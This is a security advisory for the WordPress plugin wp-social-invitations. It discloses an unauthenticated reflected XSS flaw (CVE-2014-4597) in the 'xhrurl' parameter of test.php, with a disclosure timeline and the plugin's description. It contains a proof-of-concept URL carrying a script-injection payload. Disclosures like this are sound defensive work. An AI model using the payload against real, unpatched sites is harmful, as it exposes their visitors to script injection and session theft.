wp-plugin : wp-social-invitations

Plugin Details
Plugin Name: wp-plugin : wp-social-invitations
Effected Version : 1.4.4.2 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/wp-social-invitations/test.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%282%29%3C/script%3E

Vulnerable Parameter : xhrurl

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=848497%40wp-social-invitations&old=829444%40wp-social-invitations&sfp_email=&sfph_mail=#file239


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-30
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4597
Plugin Description :
[| Allow your visitors to invite friends of their social networks such as Facebbok, Twitter, Foursquare Google, Yahoo, Hotmail and more directly into your Wordpress site. This plugin works perfectly with Buddypress and Invite Anyone Plugin. Check the [wsi demo](http://wp.timersys.com/wordpress-social-invitations/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi) Full documentation available in [our site](http://wp.timersys.com/wordpress-social-invitations/docs/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi) = Currently Supported Providers = Facebook, Twitter, Linkedin, Foursquare, Yahoo, Live, Gmail = Features = * HTML emails * Template system to edit visuals or add your branding * Invitations Queue to handle the different API limits * Sidebar widget for sidebars * Predefined invitation messages * Custom CSS * Translation ready * Documentation = Premium version = * Content locker - Share you content only to users that invited their friends by using a simple shortcode * MyCRED & Cubepoints integration * Bypass registration lock- To use the plugin on private sites that works with invitation only * Facebook uses SEND DIALOG * Linkedin delivers private messages instead of posting into user status * Twitter delivers Private messages instead of posting a tweet * GMAIL & SMTP SUPPORT * Predefined invitations can't be edited by users * Redirect users after they send invitations * Change order of providers * Free Support Get the premium version on [http://wp.timersys.com/wordpress-social-invitations/](http://wp.timersys.com/wordpress-social-invitations/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi) = Translations Credits = * Spanish - Eruedados Colombia * Serbo/Croatian - Borisa Djuraskovic ]